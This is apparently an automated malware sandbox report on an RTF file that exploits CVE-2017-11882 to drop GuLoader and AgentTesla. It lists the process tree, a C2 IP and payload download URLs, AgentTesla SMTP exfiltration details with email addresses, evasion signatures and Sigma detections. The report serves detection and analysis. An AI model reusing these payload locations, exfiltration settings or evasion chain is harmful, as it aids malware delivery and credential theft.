Windows Analysis Report T81Ip9NCGi

Overview

General Information

Sample Name:T81Ip9NCGi (renamed file extension from none to rtf)
Analysis ID:532227
MD5:79b064007e51e1cfb2f7c91c732242a9
SHA1:c4748fd11683b4b02e5bbc13746005a023f66568
SHA256:b5784dc5717d0733bcdd150fda07cc94bcc2e2529e0f03e3bb9ec9b623302496
Tags:rtf

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
GuLoader behavior detected
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Yara detected Credential Stealer
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1724 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1124 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2836 cmdline: "C:\Users\Public\vbc.exe" MD5: 99BDB5995C8DD619A3EC2B799D1CF868)
      • Acly3.exe (PID: 2804 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: E32061DA9B34B82E0AB5D0E53CAF5A09)
        • CasPol.exe (PID: 2524 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
        • CasPol.exe (PID: 2052 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
        • CasPol.exe (PID: 672 cmdline: C:\Users\user\AppData\Local\Temp\Acly3.exe MD5: 10FE5178DFC39E15AFE7FED83C7A3B44)
          • misv.exe (PID: 2812 cmdline: "C:\Users\user\AppData\Roaming\misv.exe" MD5: 1DA682EC8DCBC375B6E76660EF46D3FD)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000009.00000000.560395041.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

            Sigma Overview

            Exploits:

            Sigma detected: EQNEDT32.EXE connecting to internet
            Source: Network Connection, Author: Joe Security, Data: DestinationIp: 192.3.122.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1124, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
            Sigma detected: File Dropped By EQNEDT32EXE
            Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1124, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

            System Summary:

            Sigma detected: Droppers Exploiting CVE-2017-11882
            Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2836
            Sigma detected: Execution from Suspicious Folder
            Source: Process started, Author: Florian Roth, Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1124, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2836

            Jbx Signature Overview

            AV Detection:

            Found malware configuration
            Source: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://onedrive.live.com/download?cid=5A15FDA1AE9"}
            Source: CasPol.exe.672.9.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "dherdiana@rpxholding.comdha10apasmtp.rpxholding.comjo.esg2000@gmail.com"}
            Multi AV Scanner detection for submitted file
            Source: T81Ip9NCGi.rtf, ReversingLabs: Detection: 35%
            Antivirus / Scanner detection for submitted sample
            Source: T81Ip9NCGi.rtf, Avira: detected
            Antivirus detection for URL or domain
            Source: http://192.3.122.180/1100/vbc.exe, Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe, ReversingLabs: Detection: 20%
            Source: C:\Users\Public\vbc.exe, ReversingLabs: Detection: 20%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\misv.exe, Joe Sandbox ML: detected

            Exploits:

            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
            Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Acly3.pdb source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.dr
            Source: C:\Users\Public\vbc.exe, Code function: 3_2_00406873 FindFirstFileW,FindClose
            Source: C:\Users\Public\vbc.exe, Code function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\Public\vbc.exe, Code function: 3_2_0040290B FindFirstFileW
            Source: global traffic, DNS query: name: onedrive.live.com
            Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 192.3.122.180:80

            Networking:

            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractor, URLs: https://onedrive.live.com/download?cid=5A15FDA1AE9
            Source: Joe Sandbox View, ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 01 Dec 2021 19:57:58 GMT | Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31 | Last-Modified: Wed, 01 Dec 2021 09:20:35 GMT | ETag: "2020b-5d2122fb5045c" | Accept-Ranges: bytes | Content-Length: 131595 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
            Source: global traffic, HTTP traffic detected: GET /1100/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 192.3.122.180 | Connection: Keep-Alive
            Source: unknown, TCP traffic detected without corresponding DNS query: 192.3.122.180
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: vbc.exe, 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.411004691.000000000040A000.00000008.00020000.sdmp, misv.exe, 0000000C.00000000.670443220.000000000040A000.00000008.00020000.sdmp, vbc.exe.1.dr, vbc[1].exe.1.dr, misv.exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://s.symcd.com06
            Source: WINWORD.EXE, 00000000.00000002.566986051.00000000077FE000.00000004.00000001.sdmpString found in binary or memory: http://scas.openformatrg/drawml/2006/main
            Source: WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
            Source: WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
            Source: WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
            Source: WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: vbc.exe, 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp, vbc.exe, 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp, Acly3.exe.3.drString found in binary or memory: https://d.symcb.com/rpa0.
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://eruitg.bl.files.1drv.com/
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://eruitg.bl.files.1drv.com/y4muNEzpitWvAmX7Vz4E733dpYGfCYrMWu-PvveEpyz1hNKqOgAXlUDzjcpY7W274Qg
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/
            Source: CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/lU)
            Source: CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/y4mA4TmJkclcR_hxludBD4dX7tD1sUxzesfsAA1g8l7yxjN7FTtZtQscxnySO3fUefx
            Source: CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmpString found in binary or memory: https://fspzka.bl.files.1drv.com/y4mP7_EzD4E9pJoVHXNCm_aHG9sNUYaYn5ZLxRh4dzJ2jsCGVhpiD6B5BkejNSybMdS
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6X
            Source: CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.680070003.0000000000884000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200
            Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/w
            Source: CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAA38BD7-6E2E-4485-B33A-19C659167A7E}.tmp
            Source: unknown, DNS traffic detected: queries for: onedrive.live.com
            Source: C:\Users\Public\vbc.exe, Code function: 3_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            System Summary:

            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_0040352D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_005735BC NtProtectVirtualMemory,9_2_005735BC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0056C6DF NtAllocateVirtualMemory,9_2_0056C6DF
            Source: ~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 98%
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess Stats: CPU usage > 98%
            Source: Acly3.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Acly3.exe 7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\misv.exe 6D624544826CC99182030BB50757944FEE3734EA01E8C37A77A22214BFF4B9DF
            Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
            Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\misv.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
            Source: T81Ip9NCGi.rtfReversingLabs: Detection: 35%
            Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Users\user\AppData\Local\Temp\Acly3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$1Ip9NCGi.rtfJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDC0C.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winRTF@14/13@3/1
            Source: C:\Users\Public\vbc.exeCode function: 3_2_004021AA CoCreateInstance,3_2_004021AA
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\Public\vbc.exeCode function: 3_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,3_2_0040498A
            Source: CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
